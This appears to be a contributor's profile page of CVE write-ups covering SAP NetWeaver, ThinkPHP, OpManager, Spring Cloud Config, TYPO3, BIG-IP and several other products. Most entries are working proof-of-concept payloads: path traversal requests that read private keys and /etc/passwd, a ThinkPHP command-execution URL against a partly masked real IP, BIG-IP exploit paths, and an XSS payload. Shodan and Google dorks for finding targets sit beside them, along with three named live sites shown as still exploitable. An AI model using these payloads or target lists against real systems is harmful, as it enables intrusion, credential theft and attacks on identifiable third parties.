Mad-robot (37)
Last Login: June 11, 2021
Mad-robot's Latest (11) Contributions
Technical Analysis
Description:-
SAP NetWeaver AS JAVA (LM Configuration Wizard), versions – 7.30, 7.31, 7.40, 7.50, does not perform an authentication check which allows an attacker without prior authentication to execute configuration tasks to perform critical actions against the SAP Java system, including the ability to create an administrative user, and therefore compromising Confidentiality, Integrity and Availability of the system, leading to Missing Authentication Check.
POC
https://github.com/chipik/SAP_RECON/blob/master/RECON.py
Technical Analysis
Totaljs – Unathenticated Directory Traversal
DESCRIPTION
User can make requests like “GET /../databases/settings.json
HTTP/1.1” and include file contents from outside the /public
the directory which is the default directory for accessible static files.
Refer:-
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8903
PROOF OF CONCEPT
$ curl -v --path-as-is http://127.0.0.1:8000/.%2e/databases/settings.json
#(note that .json is in the extensions list by def.)
Technical Analysis
Totaljs – Unathenticated Directory Traversal
DESCRIPTION
User can make requests like “GET /../databases/settings.json
HTTP/1.1” and include file contents from outside the /public
the directory which is the default directory for accessible static files.
Refer:-
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8903
PROOF OF CONCEPT
$ curl -v --path-as-is http://127.0.0.1:8000/.%2e/databases/settings.json
#(note that .json is in the extensions list by def.)
Technical Analysis
Google dork:- inurl:/api/jsonws
Shodan:- Powered+By+Liferay
publicwww:-https://publicwww.com/websites/Powered+By+Liferay/
Technical Analysis
ThinkPHP RCE
DESCRIPTION
ThinkPHP before 3.2.4, as used in Open Source BMS v1.1.1 and other products, allows Remote Command Execution via public//?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]= followed by the command.
PROOF OF CONCEPT
The RCE(Remote Command Execution) vulnerability is triggered by a http request.Successfully executed the command “whoami”.
poc:
http://58.82.XXX.XXX:8080/public//?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
Technical Analysis
Next.js Path traversal
DESCRIPTION
Next.js versions before 9.3.2 have a directory traversal vulnerability. Attackers could craft special requests to access files in the dist directory (.next). This does not affect files outside of the dist directory (.next). In general, the dist directory only holds build assets unless your application intentionally stores other assets under this directory. This issue is fixed in version 9.3.2.
PROOF OF CONCEPT
HTTP://localhost/_next/static/../server/pages-manifest.json
Technical Analysis
Unauthenticated arbitrary file read on ManageEngine OpMange
DESCRIPTION
The latest release of OpManger contains a directory traversal vulnerability that allows unrestricted access to every file in the OpManager application. This includes private SSH keys, password protected Java keystores, and configuration files containing passwords to keystores, private certificates, and the backend database. If LDAP is configured then domain credentials can be obtained from “conf/OpManager/ldap.conf”.
PROOF OF CONCEPT
REQUEST:
GET /cachestart/125116/cacheend/apiclient/fluidicv2/javascript/jquery/../../../../bin/.ssh_host_rsa_key HTTP/1.1 Host: <HOSTNAME>:8060 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US,en-GB;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Connection: close Cache-Control: max-age=0 Referer: http://<HOSTNAME>:8060/
RESPONSE:
HTTP/1.1 200 Set-Cookie: JSESSIONID=4E221B342BC080BC9AC2D19378364E3B; Path=/; HttpOnly X-FRAME-OPTIONS: DENY Accept-Ranges: bytes ETag: W/"902-1586033949624" Last-Modified: Sat, 04 Apr 2020 20:59:09 GMT Vary: Accept-Encoding Date: Mon, 13 Apr 2020 15:40:01 GMT Connection: close Content-Length: 902 -----BEGIN RSA PRIVATE KEY----- MIICX...pXqnO -----END RSA PRIVATE KEY-----
Here are the files you can read
"bin/.ssh_host_dsa_key", "bin/.ssh_host_dsa_key.pub", "bin/.ssh_host_rsa_key", "bin/.ssh_host_rsa_key.pub", "conf/client.keystore", "conf/customer-config.xml", "conf/database_params.conf", "conf/FirewallAnalyzer/aaa_auth-conf.xml", "conf/FirewallAnalyzer/auth-conf_ppm.xml", "conf/gateway.conf", "conf/itom.truststore", "conf/netflow/auth-conf.xml", "conf/netflow/server.xml", "conf/netflow/ssl_server.xml", "conf/NFAEE/cs_server.xml", "conf/OpManager/database_params.conf", "conf/OpManager/database_params_DE.conf", "conf/OpManager/ldap.conf", "conf/OpManager/MicrosoftSQL/database_params.conf", "conf/OpManager/POSTGRESQL/database_params.conf", "conf/OpManager/POSTGRESQL/database_params_DE.conf", "conf/OpManager/securitydbData.xml", "conf/OpManager/SnmpDefaultProperties.xml", "conf/Oputils/snmp/Community.xml", "conf/Persistence/DBconfig.xml", "conf/Persistence/persistence-configurations.xml", "conf/pmp/PMP_API.conf", "conf/pmp/pmp_server_cert.p12", "conf/product-config.xml", "conf/SANSeed.xml", "conf/server.keystore", "conf/server.xml", "conf/system_properties.conf", "conf/tomcat-users.xml", "lib/OPM_APNS_Cert.p12"
Technical Analysis
Directory Traversal with spring-cloud-config-server
DESCRIPTION
Spring Cloud Config, 2.2.x versions before 2.2.3, 2.1.x versions before 2.1.9, and older unsupported versions allow applications to provide arbitrary configuration files through the spring-cloud-config-server module. Malicious users or attackers can use specially crafted URLs to send requests, which may lead to directory traversal attacks.
PROOF OF CONCEPT
http://127.0.0.1:8889/flag.txt%23/222/..%28_%29..%28_%29..%28_%29..%28_%29..%28_%29..%28_%29..%28_%29tmp%28_%29 http://127.0.0.1:8889/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Ftmp%252Fflag.txt%23/222/11 http://127.0.0.1:8889/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23/222/11
Video POC
Technical Analysis
Description-
The SEOmatic component before 3.3.0 for Craft CMS allows Server-Side Template Injection that leads to RCE via malformed data to the metacontainers controller.
POC-
HTTP://localhost/actions/seomatic/meta-container/meta-link-container/?uri={{7+'7'}} HTTP://localhost/actions/seomatic/meta-container/all-meta-containers?uri={{7+'7'}}
Technical Analysis
DESCRIPTION-
TYPO3 6.2.0 to 6.2.38 ELTS and TYPO3 7.0.0 to 7.1.0 (CVE-2020-8091). These versions embed a third-party component named SVG Web which provides svg.swf, a Flash file vulnerable to cross-site scripting.
Google Dork
inurl:"typo3/contrib/websvg"
Works on IE
PROOF OF CONCEPT-
Payload: svg.swf?uniqueId=%22])}catch(e){if(!this.x)alert("XSS"),this.x=1}//
Live sites:
https://www.bulac.fr/typo3/contrib/websvg/svg.swf?uniqueId=%22])}catch(e){if(!this.x)alert(%22XSS%22),this.x=1}// www.roz.si/typo3/contrib/websvg/svg.swf?uniqueId=%22])}catch(e){if(!this.x)alert(%22XSS%22),this.x=1}// www.urbanek-consulting.com/typo3/contrib/websvg/svg.swf?uniqueId=%22])}catch(e){if(!this.x)alert(%22XSS%22),this.x=1}//
Technical Analysis
CVE-2020-5902
In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.
/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp /tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'
Patch & Mitigation:-
<LocationMatch ".*\.\.;.*"> Redirect 404 / </LocationMatch>
Versions Effected
- BIG-IP 15.x: 15.1.0/15.0.0
- BIG-IP 14.x: 14.1.0 ~ 14.1.2
- BIG-IP 13.x: 13.1.0 ~ 13.1.3
- BIG-IP 12.x: 12.1.0 ~ 12.1.5
- BIG-IP 11.x: 11.6.1 ~ 11.6.5
Dorks
https://beta.shodan.io/search?query=vuln%3Acve-2020-5902
https://www.shodan.io/search?query=http.favicon.hash%3A-335242539+%223992%22